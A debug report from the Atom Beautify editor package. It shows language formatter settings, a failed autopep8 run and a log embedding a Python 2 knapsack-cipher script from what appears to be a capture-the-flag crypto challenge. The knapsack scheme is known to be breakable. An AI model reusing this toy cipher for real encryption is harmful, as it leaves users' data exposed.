"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 0,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"disabled": false,
"default_beautifier": "TypeScript Formatter",
"beautify_on_save": false
},
"ux": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"vala": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"vue": {
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 250,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"indent_inner_html": false,
"indent_scripts": "normal",
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"ins",
"small",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "Vue Beautifier",
"beautify_on_save": false
},
"visualforce": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"xml": {
"indent_inner_html": false,
"indent_size": 2,
"indent_char": " ",
"brace_style": "collapse",
"indent_scripts": "normal",
"wrap_line_length": 250,
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"ins",
"small",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"end_with_newline": false,
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"xtemplate": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"yaml": {
"padding": 0,
"disabled": false,
"default_beautifier": "align-yaml",
"beautify_on_save": false
},
"executables": {
"uncrustify": {
"path": ""
},
"autopep8": {
"path": ""
},
"isort": {
"path": ""
},
"clang-format": {
"path": ""
},
"crystal": {
"path": ""
},
"dfmt": {
"path": ""
},
"elm-format": {
"path": ""
},
"goimports": {
"path": ""
},
"emacs": {
"path": ""
},
"php": {
"path": ""
},
"php-cs-fixer": {
"path": ""
},
"phpcbf": {
"path": ""
},
"sass-convert": {
"path": ""
},
"rscript": {
"path": ""
},
"beautysh": {
"path": ""
}
}
}
```
## Beautification options
**Editor Options**:
Options from Atom Editor settings
```json
{
"_default": {
"indent_size": 1,
"indent_char": "\t",
"indent_with_tabs": true
}
}
```
**Config Options**:
Options from Atom Beautify package settings
```json
{
"apex": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"arduino": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"bash": {
"indent_size": 2,
"disabled": false,
"default_beautifier": "beautysh",
"beautify_on_save": false
},
"cs": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"c": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"clj": {
"disabled": false,
"default_beautifier": "cljfmt",
"beautify_on_save": false
},
"coffeescript": {
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 0,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"disabled": false,
"default_beautifier": "coffee-fmt",
"beautify_on_save": false
},
"cfml": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"cpp": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"crystal": {
"disabled": false,
"default_beautifier": "Crystal",
"beautify_on_save": false
},
"css": {
"indent_size": 2,
"indent_char": " ",
"selector_separator_newline": false,
"newline_between_rules": true,
"preserve_newlines": false,
"wrap_line_length": 0,
"end_with_newline": false,
"indent_comments": true,
"force_indentation": false,
"convert_quotes": "none",
"align_assignments": false,
"no_lead_zero": false,
"configPath": "",
"predefinedConfig": "csscomb",
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"csv": {
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"d": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"ejs": {
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 250,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"indent_inner_html": false,
"indent_scripts": "normal",
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"ins",
"small",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"elm": {
"disabled": false,
"default_beautifier": "elm-format",
"beautify_on_save": false
},
"erb": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"erlang": {
"disabled": false,
"default_beautifier": "erl_tidy",
"beautify_on_save": false
},
"gherkin": {
"indent_size": 2,
"indent_char": " ",
"disabled": false,
"default_beautifier": "Gherkin formatter",
"beautify_on_save": false
},
"glsl": {
"configPath": "",
"disabled": false,
"default_beautifier": "clang-format",
"beautify_on_save": false
},
"go": {
"disabled": false,
"default_beautifier": "gofmt",
"beautify_on_save": false
},
"gohtml": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"fortran": {
"emacs_path": "",
"emacs_script_path": "",
"disabled": false,
"default_beautifier": "Fortran Beautifier",
"beautify_on_save": false
},
"handlebars": {
"indent_inner_html": false,
"indent_size": 2,
"indent_char": " ",
"brace_style": "collapse",
"indent_scripts": "normal",
"wrap_line_length": 250,
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"ins",
"small",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"end_with_newline": false,
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"haskell": {
"disabled": false,
"default_beautifier": "stylish-haskell",
"beautify_on_save": false
},
"html": {
"indent_inner_html": false,
"indent_size": 2,
"indent_char": " ",
"brace_style": "collapse",
"indent_scripts": "normal",
"wrap_line_length": 250,
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"ins",
"small",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"end_with_newline": false,
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"jade": {
"indent_size": 2,
"indent_char": " ",
"disabled": false,
"default_beautifier": "Pug Beautify",
"beautify_on_save": false
},
"java": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"js": {
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 0,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"json": {
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 0,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"jsx": {
"e4x": true,
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 0,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"latex": {
"indent_char": " ",
"indent_with_tabs": false,
"indent_preamble": false,
"always_look_for_split_braces": true,
"always_look_for_split_brackets": false,
"remove_trailing_whitespace": false,
"align_columns_in_environments": [
"tabular",
"matrix",
"bmatrix",
"pmatrix"
],
"disabled": false,
"default_beautifier": "Latex Beautify",
"beautify_on_save": false
},
"less": {
"indent_size": 2,
"indent_char": " ",
"newline_between_rules": true,
"preserve_newlines": false,
"wrap_line_length": 0,
"indent_comments": true,
"force_indentation": false,
"convert_quotes": "none",
"align_assignments": false,
"no_lead_zero": false,
"configPath": "",
"predefinedConfig": "csscomb",
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"lua": {
"end_of_line": "System Default",
"disabled": false,
"default_beautifier": "Lua beautifier",
"beautify_on_save": false
},
"markdown": {
"gfm": true,
"yaml": true,
"commonmark": false,
"disabled": false,
"default_beautifier": "Tidy Markdown",
"beautify_on_save": false
},
"marko": {
"indent_size": 2,
"indent_char": " ",
"syntax": "html",
"indent_inner_html": false,
"brace_style": "collapse",
"indent_scripts": "normal",
"wrap_line_length": 250,
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"ins",
"small",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"end_with_newline": false,
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "Marko Beautifier",
"beautify_on_save": false
},
"mustache": {
"indent_inner_html": false,
"indent_size": 2,
"indent_char": " ",
"brace_style": "collapse",
"indent_scripts": "normal",
"wrap_line_length": 250,
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"end_with_newline": false,
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"nginx": {
"indent_size": 2,
"indent_char": " ",
"indent_with_tabs": false,
"dontJoinCurlyBracet": true,
"disabled": false,
"default_beautifier": "Nginx Beautify",
"beautify_on_save": false
},
"nunjucks": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"objectivec": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"ocaml": {
"disabled": false,
"default_beautifier": "ocp-indent",
"beautify_on_save": false
},
"pawn": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"perl": {
"perltidy_profile": "",
"disabled": false,
"default_beautifier": "Perltidy",
"beautify_on_save": false
},
"php": {
"cs_fixer_path": "",
"cs_fixer_version": 2,
"cs_fixer_config_file": "",
"fixers": "",
"level": "",
"rules": "",
"allow_risky": "no",
"phpcbf_path": "",
"phpcbf_version": 2,
"standard": "PEAR",
"disabled": false,
"default_beautifier": "PHP-CS-Fixer",
"beautify_on_save": false
},
"puppet": {
"disabled": false,
"default_beautifier": "puppet-lint",
"beautify_on_save": false
},
"python": {
"max_line_length": 79,
"indent_size": 4,
"ignore": [
"E24"
],
"formater": "autopep8",
"style_config": "pep8",
"sort_imports": false,
"multi_line_output": "Hanging Grid Grouped",
"disabled": false,
"default_beautifier": "autopep8",
"beautify_on_save": false
},
"r": {
"indent_size": 2,
"disabled": false,
"default_beautifier": "formatR",
"beautify_on_save": false
},
"riot": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"ruby": {
"indent_size": 2,
"indent_char": " ",
"rubocop_path": "",
"disabled": false,
"default_beautifier": "Rubocop",
"beautify_on_save": false
},
"rust": {
"rustfmt_path": "",
"disabled": false,
"default_beautifier": "rustfmt",
"beautify_on_save": false
},
"sass": {
"disabled": false,
"default_beautifier": "SassConvert",
"beautify_on_save": false
},
"scss": {
"indent_size": 2,
"indent_char": " ",
"newline_between_rules": true,
"preserve_newlines": false,
"wrap_line_length": 0,
"indent_comments": true,
"force_indentation": false,
"convert_quotes": "none",
"align_assignments": false,
"no_lead_zero": false,
"configPath": "",
"predefinedConfig": "csscomb",
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"spacebars": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"sql": {
"indent_size": 2,
"keywords": "upper",
"identifiers": "unchanged",
"disabled": false,
"default_beautifier": "sqlformat",
"beautify_on_save": false
},
"svg": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"swig": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"tss": {
"indent_size": 2,
"indent_char": " ",
"newline_between_rules": true,
"preserve_newlines": false,
"wrap_line_length": 0,
"indent_comments": true,
"force_indentation": false,
"convert_quotes": "none",
"align_assignments": false,
"no_lead_zero": false,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"twig": {
"indent_size": 2,
"indent_char": " ",
"indent_with_tabs": false,
"preserve_newlines": true,
"space_in_paren": false,
"space_after_anon_function": false,
"break_chained_methods": false,
"wrap_line_length": 250,
"end_with_comma": false,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"typescript": {
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 0,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"disabled": false,
"default_beautifier": "TypeScript Formatter",
"beautify_on_save": false
},
"ux": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"vala": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"vue": {
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 250,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"indent_inner_html": false,
"indent_scripts": "normal",
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"ins",
"small",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "Vue Beautifier",
"beautify_on_save": false
},
"visualforce": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"xml": {
"indent_inner_html": false,
"indent_size": 2,
"indent_char": " ",
"brace_style": "collapse",
"indent_scripts": "normal",
"wrap_line_length": 250,
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"ins",
"small",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"end_with_newline": false,
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"xtemplate": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"yaml": {
"padding": 0,
"disabled": false,
"default_beautifier": "align-yaml",
"beautify_on_save": false
}
}
```
**Home Options**:
Options from `C:\Users\xyz_MG\.jsbeautifyrc`
```json
{
"_default": {}
}
```
**EditorConfig Options**:
Options from [EditorConfig](http://editorconfig.org/) file
```json
{
"_default": {}
}
```
**Project Options**:
Options from `.jsbeautifyrc` files starting from directory `C:\Users\xyz_MG\Desktop\XXXXXX\2017ncstisc` and going up to root
```json
[
{
"_default": {}
},
{
"_default": {}
},
{
"_default": {}
},
{
"_default": {}
},
{
"_default": {}
}
]
```
**Pre-Transformed Options**:
Combined options before transforming them given a beautifier's specifications
```json
{
"indent_size": 4,
"indent_char": "\t",
"indent_with_tabs": true,
"max_line_length": 79,
"ignore": [
"E24"
],
"formater": "autopep8",
"style_config": "pep8",
"sort_imports": false,
"multi_line_output": "Hanging Grid Grouped",
"disabled": false,
"default_beautifier": "autopep8",
"beautify_on_save": false
}
```
### Final Options
Final combined and transformed options that are used
```json
{
"indent_size": 4,
"indent_char": "\t",
"indent_with_tabs": true,
"max_line_length": 79,
"ignore": [
"E24"
],
"formater": "autopep8",
"style_config": "pep8",
"sort_imports": false,
"multi_line_output": "Hanging Grid Grouped",
"disabled": false,
"default_beautifier": "autopep8",
"beautify_on_save": false
}
```
## Results
**Beautified File Contents**:
```python
Error: Could not find 'autopep8'. The program may not be installed.
```
### Logs
```
2017-07-23T12:31:34.241Z - debug: [beautifiers\index.coffee] beautify from Crypto.Util import number
from Crypto import Random
from Crypto.PublicKey.pubkey import *
import sys
def generateKeys(msg_len):
randomFunc = Random.new().read
upperbound = 1<<(2*msg_len+4)
sk = [number.getRandomRange(1, upperbound, randomFunc)]
for i in range(1, msg_len):
sk.append(number.getRandomRange(sum(sk) + 1, upperbound, randomFunc))
upperbound = upperbound << 2
N = number.getRandomRange(sk[msg_len-1] + 1, 2*sk[msg_len-1], randomFunc)
mask = number.getRandomRange(N/4, 3 * N/4, randomFunc)
while number.GCD(mask, N) != 1:
mask = number.getRandomRange(1, N, randomFunc)
pk = [ s * mask % N for s in sk ]
return sk, N, mask, pk
def encrypt(msg, pk):
assert(len(msg) == len(pk))
return sum([ int(msg[i]) * pk[i] for i in range(len(pk)) ])
def decrypt(cipher, sk, N, mask, pk):
msg = ['0'] * len(pk)
cipher = cipher * number.inverse(mask, N) % N
# sk = [ p * number.inverse(mask, N) % N for p in pk]
for i in range(len(pk))[::-1]:
if cipher >= sk[i]:
cipher -= sk[i]
msg[i] = '1'
print msg
return hex(int(''.join(msg), 2))[2:].rstrip('L').decode('hex')
if __name__ == "__main__":
msg = sys.argv[1]
msg_bit = bin(int(msg.encode('hex'), 16))[2:]
sk, N, mask, pk = generateKeys(len(msg_bit))
print sk, N, mask, pk
open('key.pub','w').write(str(pk))
enc = encrypt(msg_bit, pk)
print enc
print decrypt(enc, sk, N, mask, pk)
open('enc','w').write(str(enc))
[ { _default: { indent_size: 1, indent_char: '\t', indent_with_tabs: true } },
{ apex:
{ configPath: '',
disabled: false,
default_beautifier: 'Uncrustify',
beautify_on_save: false },
arduino:
{ configPath: '',
disabled: false,
default_beautifier: 'Uncrustify',
beautify_on_save: false },
bash:
{ indent_size: 2,
disabled: false,
default_beautifier: 'beautysh',
beautify_on_save: false },
cs:
{ configPath: '',
disabled: false,
default_beautifier: 'Uncrustify',
beautify_on_save: false },
c:
{ configPath: '',
disabled: false,
default_beautifier: 'Uncrustify',
beautify_on_save: false },
clj:
{ disabled: false,
default_beautifier: 'cljfmt',
beautify_on_save: false },
coffeescript:
{ indent_size: 2,
indent_char: ' ',
indent_level: 0,
indent_with_tabs: false,
preserve_newlines: true,
max_preserve_newlines: 10,
space_in_paren: false,
jslint_happy: false,
space_after_anon_function: false,
brace_style: 'collapse',
break_chained_methods: false,
keep_array_indentation: false,
keep_function_indentation: false,
space_before_conditional: true,
eval_code: false,
unescape_strings: false,
wrap_line_length: 0,
end_with_newline: false,
end_with_comma: false,
end_of_line: 'System Default',
disabled: false,
default_beautifier: 'coffee-fmt',
beautify_on_save: false },
cfml:
{ indent_size: 2,
indent_char: ' ',
wrap_line_length: 250,
preserve_newlines: true,
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
cpp:
{ configPath: '',
disabled: false,
default_beautifier: 'Uncrustify',
beautify_on_save: false },
crystal:
{ disabled: false,
default_beautifier: 'Crystal',
beautify_on_save: false },
css:
{ indent_size: 2,
indent_char: ' ',
selector_separator_newline: false,
newline_between_rules: true,
preserve_newlines: false,
wrap_line_length: 0,
end_with_newline: false,
indent_comments: true,
force_indentation: false,
convert_quotes: 'none',
align_assignments: false,
no_lead_zero: false,
configPath: '',
predefinedConfig: 'csscomb',
disabled: false,
default_beautifier: 'JS Beautify',
beautify_on_save: false },
csv:
{ disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
d:
{ configPath: '',
disabled: false,
default_beautifier: 'Uncrustify',
beautify_on_save: false },
ejs:
{ indent_size: 2,
indent_char: ' ',
indent_level: 0,
indent_with_tabs: false,
preserve_newlines: true,
max_preserve_newlines: 10,
space_in_paren: false,
jslint_happy: false,
space_after_anon_function: false,
brace_style: 'collapse',
break_chained_methods: false,
keep_array_indentation: false,
keep_function_indentation: false,
space_before_conditional: true,
eval_code: false,
unescape_strings: false,
wrap_line_length: 250,
end_with_newline: false,
end_with_comma: false,
end_of_line: 'System Default',
indent_inner_html: false,
indent_scripts: 'normal',
wrap_attributes: 'auto',
wrap_attributes_indent_size: 2,
unformatted: [Object],
extra_liners: [Object],
disabled: false,
default_beautifier: 'JS Beautify',
beautify_on_save: false },
elm:
{ disabled: false,
default_beautifier: 'elm-format',
beautify_on_save: false },
erb:
{ indent_size: 2,
indent_char: ' ',
wrap_line_length: 250,
preserve_newlines: true,
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
erlang:
{ disabled: false,
default_beautifier: 'erl_tidy',
beautify_on_save: false },
gherkin:
{ indent_size: 2,
indent_char: ' ',
disabled: false,
default_beautifier: 'Gherkin formatter',
beautify_on_save: false },
glsl:
{ configPath: '',
disabled: false,
default_beautifier: 'clang-format',
beautify_on_save: false },
go:
{ disabled: false,
default_beautifier: 'gofmt',
beautify_on_save: false },
gohtml:
{ indent_size: 2,
indent_char: ' ',
wrap_line_length: 250,
preserve_newlines: true,
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
fortran:
{ emacs_path: '',
emacs_script_path: '',
